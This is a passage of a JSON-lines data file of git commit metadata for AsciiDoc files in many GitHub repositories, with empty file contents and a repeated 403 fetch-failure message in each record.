2016-10-19-algo-10164.adoc","repos":"tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr","old_file":"_posts\/2016-10-19-algo-10164.adoc","new_file":"_posts\/2016-10-19-algo-10164.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmdgus0118\/blog.code404.co.kr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2384cb1fafe01bb06b110acc9968dd304db43fa8","subject":"Update 2017-01-17-First-Post.adoc","message":"Update 2017-01-17-First-Post.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2017-01-17-First-Post.adoc","new_file":"_posts\/2017-01-17-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cc02e1073510734bd84cc47d11d167f4cc6cee4","subject":"Update 2020-02-05-Git-Habits.adoc","message":"Update 2020-02-05-Git-Habits.adoc","repos":"IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io","old_file":"_posts\/2020-02-05-Git-Habits.adoc","new_file":"_posts\/2020-02-05-Git-Habits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdoramNaed\/idoramnaed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c535df731ab491f8188d47fbc3070ef4dbff6670","subject":"y2b create post Ferrari Headphones CES 2012","message":"y2b create post Ferrari Headphones CES 2012","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-12-Ferrari-Headphones-CES-2012.adoc","new_file":"_posts\/2012-01-12-Ferrari-Headphones-CES-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b34db85641efc840451e2be3e5f60a0bdfb8b88d","subject":"Des corrections apr\u00e8s premier revision","message":"Des corrections apr\u00e8s premier revision","repos":"uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis","old_file":"base\/tests\/selenium\/testscases\/score_encoding.adoc","new_file":"base\/tests\/selenium\/testscases\/score_encoding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"82dd6fe7ec4db92a8d7c86912923dad545cf06fe","subject":"Added Binding doc","message":"Added Binding doc\n","repos":"christophd\/camel,alvinkwekel\/camel,davidkarlsen\/camel,gnodet\/camel,nicolaferraro\/camel,DariusX\/camel,Fabryprog\/camel,apache\/camel,mcollovati\/camel,cunningt\/camel,pax95\/camel,tadayosi\/camel,onders86\/camel,christophd\/camel,pax95\/camel,christophd\/camel,pmoerenhout\/camel,adessaigne\/camel,DariusX\/camel,Fabryprog\/camel,tdiesler\/camel,nicolaferraro\/camel,alvinkwekel\/camel,onders86\/camel,pmoerenhout\/camel,pax95\/camel,nicolaferraro\/camel,christophd\/camel,apache\/camel,ullgren\/camel,gnodet\/camel,ullgren\/camel,tadayosi\/camel,mcollovati\/camel,tdiesler\/camel,cunningt\/camel,gnodet\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,objectiser\/camel,zregvart\/camel,DariusX\/camel,objectiser\/camel,adessaigne\/camel,pmoerenhout\/camel,kevinearls\/camel,objectiser\/camel,pmoerenhout\/camel,onders86\/camel,pax95\/camel,mcollovati\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,apache\/camel,tdiesler\/camel,objectiser\/camel,zregvart\/camel,davidkarlsen\/camel,apache\/camel,CodeSmell\/camel,cunningt\/camel,ullgren\/camel,kevinearls\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,zregvart\/camel,gnodet\/camel,kevinearls\/camel,mcollovati\/camel,tadayosi\/camel,onders86\/camel,cunningt\/camel,adessaigne\/camel,zregvart\/camel,punkhorn\/camel-upstream,cunningt\/camel,CodeSmell\/camel,kevinearls\/camel,nikhilvibhav\/camel,tadayosi\/camel,tdiesler\/camel,tdiesler\/camel,christophd\/camel,Fabryprog\/camel,gnodet\/camel,tadayosi\/camel,ullgren\/camel,pax95\/camel,DariusX\/camel,nicolaferraro\/camel,alvinkwekel\/camel,alvinkwekel\/camel,apache\/camel,tdiesler\/camel,nikhilvibhav\/camel,cunningt\/camel,christophd\/camel,apache\/camel,adessaigne\/camel,CodeSmell\/camel,CodeSmell\/camel,kevinearls\/camel,tadayosi\/camel,adessaigne\/camel,punkhorn\/camel-upstream,kevinearls\/camel,onders86\/camel,pax95\/camel,onders86\/camel,pmoerenhout\/camel,davidkarlsen\/camel,adessaigne\/camel","old_file":"docs\/user-manual\/en\/binding.adoc","new_file":"docs\/user-manual\/en\/binding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9333047605baadadc2214e310c4316770c6b53f7","subject":"Update 2019-11-15-red-paint.adoc","message":"Update 2019-11-15-red-paint.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-15-red-paint.adoc","new_file":"_posts\/2019-11-15-red-paint.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed492a22799667acd83c28cf0eb1133d96dcb516","subject":"Ver 18-12","message":"Ver 18-12\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Automated Eclipse install.adoc","new_file":"Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"276fb0ffbc8aee392ecf2253cfe241f46dbce480","subject":"Add numbering to chapters and sections","message":"Add numbering to chapters and sections","repos":"RainerWinkler\/Moose-Diagram","old_file":"Documentation\/ArchitectureDocumentation.asciidoc","new_file":"Documentation\/ArchitectureDocumentation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RainerWinkler\/Moose-Diagram.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddff239da0a812346189aa6becc944b1b09f0a84","subject":"Update 2015-08-14-First.adoc","message":"Update 2015-08-14-First.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-First.adoc","new_file":"_posts\/2015-08-14-First.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"237203fce31ea9b1ad923088cd6fac94893186f1","subject":"Update 2017-01-27-Model.adoc","message":"Update 2017-01-27-Model.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Model.adoc","new_file":"_posts\/2017-01-27-Model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b1ec27fdf452d2d20ada6cd5e08fd3c6ae8d1e1","subject":"Delete README-pt.adoc","message":"Delete README-pt.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"README-pt.adoc","new_file":"README-pt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a3c1f34f9275f6abc255ff48f0340778ee12b92","subject":"Opt, link","message":"Opt, link\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"SWT.adoc","new_file":"SWT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"115f195951f5c4ebf4a895cd05b6e58ffc411aa5","subject":"add README","message":"add README\n\nSigned-off-by: Takeshi Banse <db42e37a7cb27ca6628f344993036144160b0931@laafc.net>\n","repos":"hchbaw\/zce.zsh","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hchbaw\/zce.zsh.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"6d6269bd6050b8eec58ad085aa4480bc842aa94c","subject":"Try out asciidoc","message":"Try out asciidoc\n","repos":"cloud-of-things\/cot-java-rest-sdk","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cloud-of-things\/cot-java-rest-sdk.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c78f5de22f3ce58e65a4423842dc5d904f65ce74","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"GoAKL\/GoAKL,GoAKL\/GoAKL","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GoAKL\/GoAKL.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f74a8ebfa812849117526147710d21e734001c7b","subject":"Update 2016-01-19-m.adoc","message":"Update 2016-01-19-m.adoc","repos":"Mynor-Briones\/mynor-briones.github.io,Mynor-Briones\/mynor-briones.github.io,Mynor-Briones\/mynor-briones.github.io","old_file":"_posts\/2016-01-19-m.adoc","new_file":"_posts\/2016-01-19-m.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mynor-Briones\/mynor-briones.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"931e4a10837de37a4be8412126a0be830fa7925e","subject":"Document how to build Cypher style guide","message":"Document how to build Cypher style guide\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"docs\/build\/README.adoc","new_file":"docs\/build\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"187ca985e1a7c08052a0a7762dad669fd494687e","subject":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","message":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a69cfe82ccad87c35cb3e4e12df5b62740892f35","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8db0b566b33d9ad1138e20a7d1afd0bb7d76acf6","subject":"create post Thank you.","message":"create post Thank you.","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Thank-you..adoc","new_file":"_posts\/2018-02-26-Thank-you..adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ee4594e14b4cdd060cd1d888b04c0dea9edf979","subject":"docs release update","message":"docs release update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d2ea66f6b40055f6d76f871ede14e7161dd93515","subject":"Update 2015-08-21-Blog-Title.adoc","message":"Update 2015-08-21-Blog-Title.adoc","repos":"alexgaspard\/alexgaspard.github.io,alexgaspard\/alexgaspard.github.io,alexgaspard\/alexgaspard.github.io","old_file":"_posts\/2015-08-21-Blog-Title.adoc","new_file":"_posts\/2015-08-21-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexgaspard\/alexgaspard.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc7d1066e4b6004e7112966b995ba795672c1057","subject":"Add a symlink to give the readme a type extension (let's see what github makes of it ^^)","message":"Add a symlink to give the readme a type extension (let's see what github makes of it ^^)\n","repos":"bnkr\/nerve,bnkr\/nerve,bnkr\/nerve","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bnkr\/nerve.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"c7e3df8802fea77f2c5e371444c1f5896a362ab8","subject":"first cut of a readme","message":"first cut of a readme\n","repos":"simpligility\/maven-repository-tools,simpligility\/maven-repository-tools","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simpligility\/maven-repository-tools.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5c220c86dd20d5ca3f0b7b55ef5e4bb6f7fd2ead","subject":"Update 2016-06-28-First-post.adoc","message":"Update 2016-06-28-First-post.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-06-28-First-post.adoc","new_file":"_posts\/2016-06-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49db48120b049eac5d8bf5b4483f920c579ba786","subject":"Update 2015-07-27-Hello-World.adoc","message":"Update 2015-07-27-Hello-World.adoc","repos":"juliardi\/juliardi.github.io,juliardi\/juliardi.github.io,juliardi\/juliardi.github.io","old_file":"_posts\/2015-07-27-Hello-World.adoc","new_file":"_posts\/2015-07-27-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juliardi\/juliardi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8936a710a66770b0cb0ad8a48ffe65f789be262b","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98d509e9b0d7ec23a5aae87a6481121e44e35027","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80396a2aef92d22e1b450ce47ee7fb1146986b6e","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5be62d1a6079163f150ee8719629c7a460be1db6","subject":"Update 2018-2-2-Web-R-T-C.adoc","message":"Update 2018-2-2-Web-R-T-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cbb2ff0160213d939d2b98a38cc01d6b03c9c4a","subject":"Update 2017-05-28-Hello-World.adoc","message":"Update 2017-05-28-Hello-World.adoc","repos":"macchandev\/macchandev.github.io,macchandev\/macchandev.github.io,macchandev\/macchandev.github.io,macchandev\/macchandev.github.io","old_file":"_posts\/2017-05-28-Hello-World.adoc","new_file":"_posts\/2017-05-28-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/macchandev\/macchandev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"176fc20f5d3dd3ed613491f0951563a7f3f64f6e","subject":"Update 2017-09-06-Hello-World.adoc","message":"Update 2017-09-06-Hello-World.adoc","repos":"dvbnrg\/dvbnrg.github.io,dvbnrg\/dvbnrg.github.io,dvbnrg\/dvbnrg.github.io,dvbnrg\/dvbnrg.github.io","old_file":"_posts\/2017-09-06-Hello-World.adoc","new_file":"_posts\/2017-09-06-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dvbnrg\/dvbnrg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34ad46ea931c041ae73d293cb26667c801aba67f","subject":"Update 2016-08-08-ECC-Review.adoc","message":"Update 2016-08-08-ECC-Review.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-08-ECC-Review.adoc","new_file":"_posts\/2016-08-08-ECC-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"021f34f84d60a1e080a889c3fba0e3d7dfd2c56f","subject":"add integration tests README","message":"add integration tests README\n","repos":"Yubico\/yubioath-desktop,Yubico\/yubioath-desktop,Yubico\/yubioath-desktop,Yubico\/yubioath-desktop,Yubico\/yubioath-desktop","old_file":"integration_test\/README.adoc","new_file":"integration_test\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubioath-desktop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e4a9e3f3bb0dc42d0f78d84bc59ada6b0639a9ae","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19e435ce4a817f161cab66c747107238923c8e6b","subject":"Update 2015-02-06-HubPress-a-web-application-to-build-static-blog-on-Github-gh-pages.adoc","message":"Update 2015-02-06-HubPress-a-web-application-to-build-static-blog-on-Github-gh-pages.adoc","repos":"HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2015-02-06-HubPress-a-web-application-to-build-static-blog-on-Github-gh-pages.adoc","new_file":"_posts\/2015-02-06-HubPress-a-web-application-to-build-static-blog-on-Github-gh-pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e654f8ddf72d2370d531704665080984c397500","subject":"Update pay-me.adoc","message":"Update pay-me.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/pay-me.adoc","new_file":"_posts\/pay-me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25a7d9b03dd3d5460dc7bc09a382543f8f52af76","subject":"Initial commit","message":"Initial commit\n","repos":"jbake-org\/jbake-forge-addon,jbake-org\/jbake-forge-addon","old_file":"CONTRIBUTION.asciidoc","new_file":"CONTRIBUTION.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbake-org\/jbake-forge-addon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e80ecdd2549b5eeeda9d38bfc21257bf467edae","subject":"Update 2015-06-18-Hello-Word.adoc","message":"Update 2015-06-18-Hello-Word.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-Hello-Word.adoc","new_file":"_posts\/2015-06-18-Hello-Word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbfdf00254467b6bdeb11d8634a28a1d6bfc626c","subject":"Update 2015-06-18-hello-word.adoc","message":"Update 2015-06-18-hello-word.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-hello-word.adoc","new_file":"_posts\/2015-06-18-hello-word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c8d20d9f69d04f5f425f7fe9bfb9552ffb7dbe0","subject":"Update 2016-08-12-2016-08-11.adoc","message":"Update 2016-08-12-2016-08-11.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-12-2016-08-11.adoc","new_file":"_posts\/2016-08-12-2016-08-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6335ef3db94a01db1b0fa314f06e8606382bb69","subject":"Update 2016-10-31-First-post.adoc","message":"Update 2016-10-31-First-post.adoc","repos":"emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io","old_file":"_posts\/2016-10-31-First-post.adoc","new_file":"_posts\/2016-10-31-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/emilio2hd\/emilio2hd.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"baf0e9e853e69e046b1f30ec3bd058a845313bb9","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"934ab7bf727145cd5cc6fa4f7f02fc36640cb0b1","subject":"Update 2017-01-10-Fedora25-Synapse-and-Your-Display-Server.adoc","message":"Update 2017-01-10-Fedora25-Synapse-and-Your-Display-Server.adoc","repos":"iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io","old_file":"_posts\/2017-01-10-Fedora25-Synapse-and-Your-Display-Server.adoc","new_file":"_posts\/2017-01-10-Fedora25-Synapse-and-Your-Display-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iamthinkking\/iamthinkking.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8f60b33f75b1480bbac2763453f7512a5afba1b","subject":"Update 2018-06-17-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-17-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-17-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-17-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01394a5c478fd2e1fa0622b6104596eb2fbec6b0","subject":"Update 2016-02-14-Over-Rendering-with-Staggered-Alpha.adoc","message":"Update 2016-02-14-Over-Rendering-with-Staggered-Alpha.adoc","repos":"marksubbarao\/hubpress.io,marksubbarao\/hubpress.io,marksubbarao\/hubpress.io,marksubbarao\/hubpress.io","old_file":"_posts\/2016-02-14-Over-Rendering-with-Staggered-Alpha.adoc","new_file":"_posts\/2016-02-14-Over-Rendering-with-Staggered-Alpha.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marksubbarao\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56c159bc35919c58df6736f7a34515662345da04","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/06\/11\/deref.adoc","new_file":"content\/news\/2021\/06\/11\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 